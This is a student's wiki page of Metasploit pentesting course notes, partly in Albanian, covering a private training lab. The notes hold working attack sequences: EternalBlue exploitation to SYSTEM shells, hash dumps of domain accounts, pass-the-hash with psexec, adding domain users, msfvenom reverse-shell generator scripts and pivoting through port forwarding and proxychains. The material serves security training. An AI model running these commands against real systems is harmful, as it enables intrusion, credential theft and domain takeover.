dardan:cyberacademy:module-3-pentesting-with-metasploit
Chapter 3 – Introduction to Metasploit
1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes
msf > show exploits
help search
search ms17-010
search cve:2013-3660
msf > search unreal
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
msf> use
msf> set
To start the Database at a terminal prompt, type the following:
● service postgresql start
● service metasploit start
● msfconsole
LHOST = Local Host, or our Kali System
RHOST = Remote Host, or our target System
LPORT = Port we want to use on our Kali System
RPORT = Port we want to attack on our target System
> use exploit/unix/irc/unreal_ircd_3281_backdoor
> show options
> set rhost 192.168.15.214
> exploit
##Multiple Target Types
> show targets
> use exploit/windows/smb/ms08_067_netapi
> show options
> show targets
> set target 2
> show options
> show advanced
##Picking a Payload
> show payloads
> set payload
examples:
set payload osx/x86/shell_reverse_tcp
set payload linux/x64/shell_reverse_tcp
set payload windows/shell_reverse_tcp
*set payload windows/meterpreter/reverse_tcp
reverse_tcp ##type of ways that the payloads communicate back to the attacking system
##Setting Payload Options
> show options
> set payload windows/meterpreter/reverse_tcp
##Running the Exploit
>show options
> set lhost 192.168.15.236 (kali)
> set rhost 192.168.15.243 (win)
> exploit
##Connecting to a Remote Session
> sessions ## To check what sessions were created
> sessions -i nr
meterpreter> ##prompt When we connect to the session
meterpreter> shell ##we can see that we do indeed have a remote shell to the Windows system.
Chapter 4 – Meterpreter Shell
word
permes smb script mund me ngarku ne qat doc
cfar malware eshte?
pivoiting | tunneling
autoraw
reverse vs bind
#############################################################################
28.05.2018
rapid7 = metasploit e shkruar ne ruby
development/perdorimi
exploit
vulnerability
threat
payload (e detekton antivirusi)
vspftpd 2.3.4 (vulnerable)
metasploit:
msfconsole (prefered)
msfvenom
msfpayload (bashk ne venom)
msf encode (bashk ne venom)
msfgui - depirciated
msfweb - depirciated
msfconsole (prefered):
armitage - gui per metasploit
modulet:
exploits
auxiliary
post
payload
encoders
nops
msfvenom
-p --payload
windows #OS platforma
/meterpreter #platforma, lloj i payloadit
reverse_tcp #forma e komunikimit
LHOST= #ip e jone e cila ka me komuniku me malware
LPORT= #port jone ku kemi me prit komunikim
-f --Output format, exe or elf
-o --out <path> Save the payload psh foto.exe
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost local ip
set lport local port
xploit
shell
dir :)
#############################################################################
###04.2018
RC scripta
#!bin/bash
echo -n
read
chmod +x dardan
./dardan
example
msfvenon -p windows/meterpreter/reverse_tcp -f >shell.exe
==================================================
nano script.rc --create
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set RHOST 172.16.60.88
exploit
sessions -i 1
msfconsole -r script.rc --to execute
==================================================
nano auto.sh -- to create the file
chmod +x auto.sh -- to make executable
./auto.sh -- to execute
--------------------------------
#!bin/bash
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPOST: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p $payload LHOST=$lhost LPOST=$lport -f $format -o $emri.$format
==================================================
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPORT: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p $payload LHOST=$lhost LPOST=$lport -f $format -o $emri.$format
echo "use exploit/multi/handler" > script.rc
echo "set payload $payload" >>script.rc
echo "set lhost $lhost" >> script.rc
echo "set lport $lport" >> script.rc
echo "exploit -j" >> script.rc
msfconsole -r script.rc
./auto.sh --to execute
==================================================
.#############################################################################
*11.06.2018*
kali - 172.16.60.78
*Pasi te marrim qasje.*
Vector of Attack
1. viber
check cfar app po perdor (psh viber)
explore a permban imortant data
2.
Outlook
mail files mundet mu marr prej hacked machine
outlook e run paswordin plaintext
3.
Skype
password e jep hashed, chat txt e jep clear text
*Qysh me marr qasje mrena?*
##Target network 172.16.0.0/20
##Enumeration
SCAN: nmap 172.16.0.0/24 --make a default scan
nmap -Pn 172.16.0.0/20 --Pn ping less
nmap -O 172.16.0.0/20
##Targeted service 445 SMB (services open, version services psh ftp, 3389)
##Confirm vulnerable hosts
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 172.16.0.0/26
set threads 10
run
##VULNERABLE HOSTS
+ 172.16.0.3:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7600)
+ 172.16.0.12:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
+ 172.16.0.16:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
+ 172.16.0.17:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
+ 172.16.0.18:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
+ 172.16.0.19:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
+ 172.16.0.20:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
##EXPLOITATION
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 172.16.0.3 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.12 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.16 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.17 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.18 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.19 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.20 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
##POST EXPLOITATION
use post/windows/gather/enum_domain --e gjen doamin srv
set session 1
run ( Cyberlab)
use post/windows/gather/smart_hashdump --nxerr dhe presenton sam/system
set session 1
run
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:647a6dc3a05c2a2443ae9c03b5959c44
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:822d4c38608cd94739144ace38e0a3db
[+] Larry:1110:aad3b435b51404eeaad3b435b51404ee:847d0104f7c770d74cf4f3fcbaaacd65
[+] John:1112:aad3b435b51404eeaad3b435b51404ee:849c695d5a50144028fd6c672b00d751
[+] Lucia:1114:aad3b435b51404eeaad3b435b51404ee:78f25f28c59932b06b58b59711e8fb73
[+] Marina:1116:aad3b435b51404eeaad3b435b51404ee:edef6c82896b00f277e5a46111f806a5
[+] Alina:1117:aad3b435b51404eeaad3b435b51404ee:4484a79fef99132c010c98bde75c5399
[+] Keith:1118:aad3b435b51404eeaad3b435b51404ee:7e2b029882be49edc5633b34d4db3e7e
[+] Patrick:1122:aad3b435b51404eeaad3b435b51404ee:609dd6f9fc3d51b3d628219de6f91a8d
[+] Marc:1124:aad3b435b51404eeaad3b435b51404ee:4297197418be7a0e111290f4fc341e67
[+] Luke:1126:aad3b435b51404eeaad3b435b51404ee:faeadb333798089ee46de1f67740472d
[+] Alfa:1130:aad3b435b51404eeaad3b435b51404ee:fd6e9a2f2646007192c7450ba21fb4df
[+] Beta:1131:aad3b435b51404eeaad3b435b51404ee:8fb9d80ff33d178c16c3f43503468e83
[+] WIN-GOMU62G0LQE$:1000:aad3b435b51404eeaad3b435b51404ee:c17b74d23f5be7ad4284283393636df9
[+] LARRY-PC$:1111:aad3b435b51404eeaad3b435b51404ee:4b545d45b94464cfb56909fc8f7ddf1a
[+] JOHN-PC$:1113:aad3b435b51404eeaad3b435b51404ee:0c913011dfdb67a9ca60b739fb578478
[+] LUCIA-PC$:1115:aad3b435b51404eeaad3b435b51404ee:890f2e94b3239f87093e21724aabf141
[+] KEITH-PC$:1119:aad3b435b51404eeaad3b435b51404ee:8a4d68ea1683fcbdaa73cba4e8a077ff
[+] ALINA-PC$:1120:aad3b435b51404eeaad3b435b51404ee:4f9d70ddc18d29fa26634f1cf190c81f
[+] MARINA-PC$:1121:aad3b435b51404eeaad3b435b51404ee:d128fd0a1972738bec382bd777d1a6ca
[+] PATRICK-PC$:1123:aad3b435b51404eeaad3b435b51404ee:25d12edfe263dfa74d241b7eb8b39ea5
[+] MARC-PC$:1125:aad3b435b51404eeaad3b435b51404ee:03eb6af971a5d16b38fd91703e034077
[+] LUKE-PC$:1127:aad3b435b51404eeaad3b435b51404ee:73ab52f9d4900d661da3477b728ea366
use auxiliary/scanner/smb/smb_login
set smbuser John
set smbdomain Cyberlab
set smbpass (vlera e hash=John:1000:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1:::
set rhosts 172.16.0.0/26
set threads 10
set verbose false
run
([+] 172.16.0.12:445 - 172.16.0.12:445 - Success: '.\John:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1' Administrator)
use exploit/windows/smb/ms17_010_eternalblue
on target172.16.0.18
verify then exploit
set porcessname lsass.exe
exploit =-WIN-=
getuid /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
sysinfo /PC info
use post/windows/gather/enum_applications
set rhost 172.16.0.3
run
use exploit/windows/smb/psexec
set payload windows/meterperter/bind_tcp
set rhost 172.16.0.12
set smbuser
set smbdom
set smb pass
expoit
run post/multi/gather/skype_enum
run
cat /home/.... --shihet skype chat me user e pass te nje email
rdesktop 172.16.0.13 -u Larry -p ESGL -d CyberLab
use exploit/windows/smb/psexec
set smbdomain Cyberlab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.12
exploit
exploit
getuid
shell
net user --i sheh users
net user John --i sheh infot e keti user
net user John /domain --domain info
net user user1 password /add /domain --if denied
net user user1 password /add --add localy
net group "Domain Admins" /domain --tregon kush usera jane member
session
session -i
backgroud
-------------------------------------
run post/windows/gather
run post/windows/gather/credentials
run post/windows/gather/forensics
/vnc
/windows_autologon
/enum_domain
/enum_hostfile
/enum_chrom
/enum_ie
/enum_logged_on_users
/enum_ms_product_keys
/enum_putty_saved_sessions
/screen_spy
/usb_history
/screen_unlock
run post/multi/gather/
run post/multi/manage
skype_enum
.#############################################################################
18.06.2018
Vectors: Link, Email, Social Engeenering ...adobe flash vulnerabilities,
load option ne meterpreter????
query ne DC, impersonation, add user ad domain admin member, hack DC,
Teknika: socks4, (auxiliary
proxychains (tool, /ect/share/socks4
portfwd (port forwarding, ne hacked machine e bon port fw port ne localhost IP -> ne hacker machine
tool: autoroute (POST tool)
Stage1 - autoroute
nmap -sn 172.16.0.0/24 (ping scan
nano 172.16.0.0.exe (e run scan rezult
nmap -sS -sV172.16.0.16 /gjen portet hap, banner grabbing (e run me nje file rezults
nmap -p445 --scripts smb-vuln-ms17-010 172.16.0.16 (tregon SMB vuln. infos, https://exploit-db.com (me marr info per naj exploit
msfconsole
msf>search ms17_010
use exp/win/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.16
exploit
.>getuid
.>shell
net user /domain
net user nt-authoriity pass /add /domain
net group "domain admin" /domain
.> ping 172.16.16.16 (ska ping
shell> ka ping
.> run post/multi/manage/autoroute
.>background
.>route
.> use aux/scan/portscan/tcp
set rports 445
set rhost 172.16.16.16
run (tash e sheh edhe IP e tjetrin interface
set rhosts 172.16.16.0-50 (range scan per 445
set threads 10
run
session -i 1
arp -a ( me pa me kan ka communicate pra i bon cach
meterpreter> run arp_scanner -r 172.16.16.0/24
.>background
set rhost 172.16.16.23
.>set ports 22 (konfirmon open ports
run
.>sessions
.>set rpots 1-1000
run
nga hacker machine sk aping
meterpreter> portfwd add -l 21 -p 21 -r 172.16.16.23
nga hacker machine
ftp 172.16.16.23
meterpreter> run
nga hacker machine
ftp 172.16.16.23 (tash e qet hapur
meterpreter> portfwd flush
.> use aux/scanner/ftp/ftp_login
.>set rhosts 172.16.16.23
.>run ( tregon version dhe info tjera per servisin
.> use aux/scanner/ftp/anonymous
.>set rhosts 172.16.16.23
.>exploit
.> use aux/scanner/ftp/ftp_login
.>set rhosts 172.16.16.23
set password anonymous
run
.> sessions
meterpreter>portfwd -l 2221 -p 21 -r 172.16.16.23
nga hacker machine
ftp 172.16.16.23
nc 172.16.16.23 2221
meterpreter> portfwd flush
.>bckg
.>user aux/server/socks4a
.>run
nga hacker machine
nano /etc/proxychains.conf add socks4 127.0.0.1 1080
nmap 172.16.16.23 -p 21 (0 host up
proxychains nmap 172.16.16.23 -p 21
proxychains ftp 172.16.16.23 (vjen login
ftp>
nga hacker machine
proxychains firefox http://172.16.16.24
proxychains telnet 172.16.16.24 22
------------------------------------------------
use aux/server/
browser_autopwn2
.>set exitonsession
.>show advanced
meterpreter> use port/win/gather.enum_domain
.>set AutoRunScript port/win/gather.enum_domain (sessioni i marrur e bon run auto nje tjeter modul
.#############################################################################
nmap 60.52 -p- (all running port
-sS -SV -p51 60.52 (banner grabbing
nc 172.16.60.52 51
nano txt (ruje vleren en file
base64 or 32 -d txt ( e dekodon
############################################################################
############################################################################
dardan/cyberacademy/module-3-pentesting-with-metasploit.txt · Last modified: 2019/01/02 17:24 by dardan